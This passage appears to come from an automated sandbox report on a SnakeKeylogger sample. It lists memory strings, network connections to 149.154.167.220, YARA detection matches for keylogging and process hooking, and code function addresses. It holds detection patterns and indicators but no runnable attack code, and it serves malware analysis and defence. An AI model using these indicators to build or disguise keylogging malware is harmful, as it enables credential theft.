Source: InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: InstallUtil.exe, 00000004.00000002.2569306283.0000000002551000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4
Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CB0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000254C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49753 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_00EB1930
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_00EB1921
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_00EB2BA1
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_00EB1BB0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_00EB1B4D
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_00EB1C06
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_00EB2618
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_00EB2613
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04E9956B
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04E95660
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04E9F850
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04E97BF7
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04E91C48
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04E91C39
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04E95650
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04E9DB6F
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04FF2B48
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_04FF2B0C
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05127118
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0512710A
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0512E9B0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051277CF
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05120A5F
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05120A70
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1A90
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1DBF
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1DF9
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1630
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1622
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1E83
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1EC2
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E49B8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E0006
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E0040
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1B78
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1B6C
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1BA7
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E33A0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1BEC
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1A80
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_051E1AFB
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05250040
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0525BB20
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05252460
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05252450
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_052538A8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05253898
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0525BB10
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0526A0F8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0542A758
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_054203D5
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0542DAC0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05429AEC
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05427400
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0542A749
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05420040
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_05420006
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0542F0B8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_054273F0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_0542DDE7
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_054CE120
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_054B0040
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exe Code function: 0_2_054B0006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00CE2944
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00CE32D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00CE4270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00CE2938
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00CEEE28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00CE1DF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_00CE1E08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DD278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028D5360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DA088
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DC146
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DC738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DC468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DCA08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DE988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028D69A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DCFA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028D6FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DCCD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DFAC1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028D39ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028D29EC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028DE97B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_028D3E09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B2610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B8FE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B1850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B4CE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B9930
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B2600
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BF619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BD629
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BF628
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BD638
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BDAC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BFAA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BDAB9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BFAB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BDF49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BDF58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B9710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B0B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B0B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B8FD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BE3D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BE3E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B1841
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B8850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BE868
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B8860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BE878
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B003F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064B4CDE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BECF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BED08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BF188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BF198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BD198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_064BD1A8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_00E01930
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_00E01921
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_00E02BA2
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_00E01BB0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_00E01B4D
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_00E01C06
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_00E02613
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_00E02618
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_0506956B
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05065660
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_0506F850
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05067BF7
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05061C39
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05061C48
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_0506DB6F
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_051B7118
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_051B710A
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_051BE9B0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_051B77CF
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_051B0A5F
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_051B0A70
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271A90
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271DBF
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271DF9
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271622
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271630
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271E83
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271EC2
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_052749B8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05270006
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05270040
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271B6C
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271B78
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271BA7
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_052733A0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271BEC
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271A80
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05271AFB
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_052E0040
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_052E2460
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_052E2450
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_052E38A8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_052E3898
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_052FA0F8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054B03D5
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054BDAC0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054B9AEC
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054B7400
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054BA74C
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054BA758
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054B0040
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054B0006
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054BF0B8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054B73F0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_054BDDE7
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_0555E120
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05540040
                      Source: C:\Users\user\AppData\Roaming\XsdType.exe Code function: 3_2_05540006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_006242FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_006221F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00622208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228D278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_02285370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228C147
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228C738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228C468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228CA08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_022869A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228E988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_02283E09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228CFAA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_02286FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228CCD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_02289DE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_02283AA1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228F961
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0228E97A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_022829EC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_022839EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E69408
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E65108
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E61850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E69AD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E62A10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E6ED20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E6ED10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E68C80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E68C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E6E400
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E6DF61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05E6DF70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6F6404_2_05E6F640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6D6414_2_05E6D641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05E6D6504_2_05E6D650
